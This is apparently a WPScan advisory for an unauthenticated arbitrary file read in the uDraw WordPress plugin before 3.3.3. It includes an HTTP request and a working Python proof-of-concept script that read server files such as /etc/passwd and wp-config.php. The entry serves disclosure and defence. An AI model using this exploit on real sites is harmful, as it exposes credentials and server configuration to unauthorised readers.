WordPress Plugin Vulnerabilities
uDraw < 3.3.3 - Unauthenticated Arbitrary File Access
Description
The plugin does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc)
Proof of Concept
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0
Connection: close
action=udraw_convert_url_to_base64&url=/etc/passwd
#!/usr/bin/env python3
#
# Usage:
# python3 poc.py <wordpress root url> <absolute filepath to include>
#
# Example:
# python3 poc.py http://127.0.0.1:8080/ /etc/passwd
#
import sys
import base64
import requests
target_url = sys.argv[1]
filepath = sys.argv[2]
with requests.Session() as session:
response = session.get(target_url)
response = session.post(f"{target_url.rstrip('/')}/wp-admin/admin-ajax.php", data={
"action": "udraw_convert_url_to_base64",
"url": filepath,
})
b64_file = response.text.split(",")[1].strip('"')
print(base64.b64decode(b64_file).decode())
Affects Plugins
Fixed in 3.3.3 References
CVE
Classification
Type
FILE DOWNLOAD
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-03-29 (about 2 years ago)
Added
2022-03-29 (about 2 years ago)
Last Updated
2022-04-13 (about 2 years ago)
WPScan 